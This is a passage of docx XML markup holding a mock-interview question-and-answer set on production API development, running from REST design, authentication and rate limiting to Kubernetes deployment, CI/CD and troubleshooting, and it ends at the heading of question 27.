        <w:t>A: I would design it as a small platform API with clear endpoints for approved automation tasks, backed by authentication, authorization, audit logs, and approval controls for risky operations. The service would run on Kubernetes with a Deployment, Service, Ingress, ConfigMaps, Secrets, probes, resource limits, HPA, and structured logging. It would use a database for request history and job state, a queue or background worker for long-running automation, and least-privilege cloud or Kubernetes identities. CI/CD would run tests and scans, build an immutable image, deploy progressively, and validate metrics. Observability would include request latency, error rate, job success rate, audit events, and traces for external API calls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 75 - API Development Production Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. What is an API and why do we use APIs in modern applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An API, or Application Programming Interface, is a contract that allows one software system to interact with another. In modern applications, APIs separate frontend, backend, mobile apps, automation tools, and third-party integrations. A good API hides internal implementation details and exposes controlled operations with clear request and response formats, authentication, authorization, validation, error handling, and documentation. In production, APIs also need observability, versioning, rate limiting, and security controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the difference between REST API, GraphQL, and gRPC?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: REST is resource-oriented and commonly uses HTTP methods like GET, POST, PUT, PATCH, and DELETE with JSON responses. It is simple and widely used. GraphQL lets clients request exactly the fields they need through a schema, which can reduce over-fetching but adds complexity around authorization, caching, and query cost control. gRPC uses Protocol Buffers and HTTP/2, making it efficient for service-to-service communication, streaming, and strongly typed contracts. For public or general web APIs I often choose REST; for flexible frontend data fetching GraphQL can help; for internal high-performance microservice calls gRPC is strong.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you design REST endpoints for a user or order management service?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/REST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would model endpoints around resources and keep naming consistent. For example, GET /users lists users, POST /users creates a user, GET /users/{id} fetches one user, PATCH /users/{id} partially updates a user, and DELETE /users/{id} deletes or deactivates a user. For orders, I might use GET /orders, POST /orders, GET /orders/{id}, and GET /users/{id}/orders if the relationship matters. I would define request and response schemas, status codes, validation rules, pagination, filtering, authorization, and error response format before implementation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are common HTTP methods and when would you use GET, POST, PUT, PATCH, and DELETE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GET is used to read data and should not change server state. POST is used to create a resource or trigger an operation. PUT usually replaces an entire resource and should be idempotent. PATCH updates part of a resource. DELETE removes or deactivates a resource. In senior API design, the method should match the behavior because clients, caches, gateways, and monitoring tools rely on HTTP semantics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are important HTTP status codes every API developer should know?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/HTTP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Important status codes include 200 for successful read or update, 201 for created, 202 for accepted async processing, 204 for success with no response body, 400 for invalid request, 401 for unauthenticated, 403 for authenticated but not authorized, 404 for not found, 409 for conflict, 422 for validation errors, 429 for rate limiting, 500 for unexpected server error, 502 or 503 for upstream/service availability issues, and 504 for gateway timeout. Good APIs use status codes consistently and include a useful error body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you validate API request payloads and query parameters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I validate request payloads using schema models, type checks, required fields, allowed values, size limits, format checks, and business rules. In FastAPI this is commonly done with Pydantic models. In other frameworks, similar validation libraries exist. I validate query parameters for pagination limits, sorting fields, filters, and date ranges. Validation should happen before business logic, and validation errors should return a consistent 400 or 422 response without exposing internal details.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you implement authentication in an API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Authentication verifies who the caller is. Depending on the use case, I would use OAuth2/OIDC with an identity provider, JWT bearer tokens, session cookies for web apps, API keys for service integrations, or mTLS for service-to-service authentication. In production, I prefer short-lived tokens, token validation at the gateway or service layer, secure secret storage, HTTPS, proper token audience and issuer checks, and careful logging so tokens are never exposed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is the difference between authentication and authorization?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Authentication answers: who are you? Authorization answers: what are you allowed to do? For example, a user may authenticate successfully with a valid token, but still not be authorized to delete a production resource. In API design, I first validate identity, then check roles, scopes, groups, tenant ownership, or resource-level permissions before allowing the operation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do JWT tokens work in API authentication?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A JWT is a signed token containing claims such as subject, issuer, audience, expiry, scopes, and roles. The API validates the token signature using a shared secret or public key, checks expiry, issuer, and audience, and then uses claims for identity and authorization decisions. JWTs are useful because services can validate tokens without calling the identity provider every time, but they must be short-lived, properly verified, and never trusted without checking signature and claims.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you implement role-based access control for APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Auth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would define roles or scopes based on business operations, not just technical endpoints. For example, viewer can read, operator can trigger approved actions, and admin can manage configuration. In the API, authorization middleware or dependencies should check the caller's role, scope, tenant, and resource ownership. For sensitive operations, I may require additional approval, audit logging, or break-glass workflows. I would also test authorization paths because broken access control is one of the most common API risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How do you handle database transactions in API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A transaction groups related database changes so they either all succeed or all roll back. For example, when creating an order and reducing inventory, both changes should be committed together or not at all. In API code, I keep transactions short, avoid long external calls inside transactions, handle rollback on exceptions, and design idempotency for retry scenarios. For distributed systems, I avoid pretending one database transaction can cover every external service; instead I use outbox patterns, queues, or compensating actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How should an API handle errors and return error responses?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An API should return consistent error responses with status code, error code, message, and optional correlation ID. Validation errors should tell the client what field is wrong. Authentication and authorization errors should be clear but not leak sensitive details. Server errors should not expose stack traces. Internally, the API should log enough context for debugging, including trace ID, route, status, dependency, and exception type. Good error handling improves both client experience and incident response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How do you handle API versioning without breaking existing clients?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Versioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I avoid breaking changes where possible. For breaking changes, I use versioning such as /v1 and /v2 paths, headers, or media types depending on the platform standard. I keep old versions running during a deprecation window, communicate migration timelines, and monitor usage by client. Additive changes like adding optional fields are usually safe. Removing fields, changing meaning, changing required fields, or changing status codes can break clients, so those require versioning and coordination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you implement pagination, filtering, and sorting in an API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Pagination</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For pagination, I can use limit and offset for simple cases, but cursor-based pagination is better for large or frequently changing datasets. Filtering should allow approved fields only, such as status, date range, owner, or region. Sorting should also whitelist allowed fields to avoid unsafe queries. I would define max page size, return metadata such as next cursor, and ensure database indexes support common filter and sort patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is idempotency in APIs and why is it important?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Idempotency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Idempotency means repeating the same request produces the same result without duplicate side effects. GET, PUT, and DELETE are generally expected to be idempotent. POST is not automatically idempotent, so for payment, order, or automation-trigger APIs, I would use an idempotency key. This matters because clients retry after timeouts, networks fail, and gateways can resend requests. Without idempotency, retries can create duplicate orders, duplicate jobs, or unsafe repeated actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How would you implement rate limiting and throttling for APIs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Rate Limiting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would usually implement rate limiting at the API gateway, ingress, load balancer, or service mesh layer, and sometimes in the application for tenant-specific rules. Common strategies include fixed window, sliding window, token bucket, and leaky bucket. I would return 429 when limits are exceeded and include retry information where appropriate. Rate limiting protects the API from abuse, runaway clients, and noisy tenants, but limits should be based on real capacity and business needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. What API security best practices would you follow in production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would enforce HTTPS, strong authentication, authorization, input validation, output encoding where needed, rate limiting, secure CORS, safe error responses, dependency scanning, secret management, audit logging, and least-privilege access to databases and cloud services. I would also protect against common risks such as broken access control, injection, excessive data exposure, SSRF, insecure direct object references, and sensitive data in logs. Security should be handled at both gateway and application layers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How would you test APIs before releasing them to production?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would test APIs at multiple levels: unit tests for business logic, integration tests with database or dependencies, contract tests for request/response compatibility, authentication and authorization tests, validation tests, negative tests, performance/load tests, and security checks. I would also test migration compatibility and rollback behavior. In CI/CD, tests should run automatically on pull requests, and production deployments should include smoke tests and health checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How do you document APIs for frontend teams and external consumers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I document APIs using OpenAPI or Swagger with endpoint descriptions, request and response schemas, status codes, error formats, authentication requirements, examples, pagination rules, rate limits, and versioning policy. Documentation should be generated from code where possible but still reviewed for clarity. For external consumers, I would also provide onboarding notes, sample curl commands, SDK examples if needed, and a changelog.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. What logs, metrics, and traces would you add to a production API?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For logs, I would add structured JSON logs with request ID, trace ID, method, route, status code, latency, user or tenant ID when safe, dependency name, and error type. For metrics, I would track request count, error rate, p95 and p99 latency, saturation, database latency, dependency failures, and rate-limit events. For traces, I would instrument inbound requests, database calls, external API calls, queue publishing, and important business operations. Correlation IDs make debugging across services much faster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. How would you improve API performance and reduce latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Performance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would start by measuring latency by route and dependency, then identify whether the bottleneck is application CPU, database queries, external API calls, network, serialization, or cold starts. Fixes may include indexing queries, connection pooling, caching, async I/O for suitable workloads, reducing payload size, pagination, avoiding N+1 queries, tuning worker count, and moving slow work to background jobs. I would validate improvements with load testing and production metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you design an API to handle high traffic?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Scalability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would design for horizontal scaling with stateless API instances behind a load balancer, autoscaling based on CPU, latency, or request rate, connection pooling, caching, rate limiting, and resilient dependency handling. I would use queues for long-running or bursty work, circuit breakers or timeouts for downstream services, and database scaling strategies such as read replicas, indexes, partitioning, or caching. Observability and capacity testing are critical because scaling the API alone does not help if the database is the bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. How would you deploy an API using Docker and Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Deployment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would build a minimal Docker image, run as a non-root user, configure the app through environment variables or mounted secrets, and expose the application port. In Kubernetes, I would create a Deployment, Service, ConfigMap, Secret, readiness and liveness probes, resource requests and limits, HPA, and Ingress or gateway routing. I would use immutable image tags, rolling or canary deployments, monitor error rate and latency after rollout, and keep rollback available.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. How would you design a CI/CD pipeline for API development?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The pipeline should run formatting, linting, unit tests, integration tests, API contract tests, dependency scanning, secret scanning, and container image scanning. Then it should build an immutable image, push it to a registry, deploy to dev or staging, run smoke tests, and promote to production with approval or automated gates. For production, I would include database migration safety checks, health checks, monitoring validation, and rollback. The pipeline should make broken API changes visible before they reach clients.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. An API is returning intermittent 500 errors after deployment. How would you debug it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would first check whether the errors started after a specific deployment, config change, or traffic increase. Then I would inspect logs by request ID, error type, route, and pod version. I would check Kubernetes events, restarts, OOM kills, CPU throttling, readiness probe failures, database connection pool exhaustion, dependency timeouts, and recent schema changes. If impact is high and the previous version was stable, I would roll back or shift traffic while continuing root cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. An API latency increased suddenly in production. What would you check first?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>API/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would check latency by route, error rate, traffic volume, recent deployments, dependency latency, database query time, connection pool saturation, CPU and memory, garbage collection if relevant, and infrastructure changes. Distributed traces are very useful here because they show where time is spent: application code, database, cache, external API, or network. I would also compare p50, p95, and p99 because tail latency often reveals saturation before average latency does.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Design a production-ready API platform for internal automation tools.</w:t>
      </w:r>
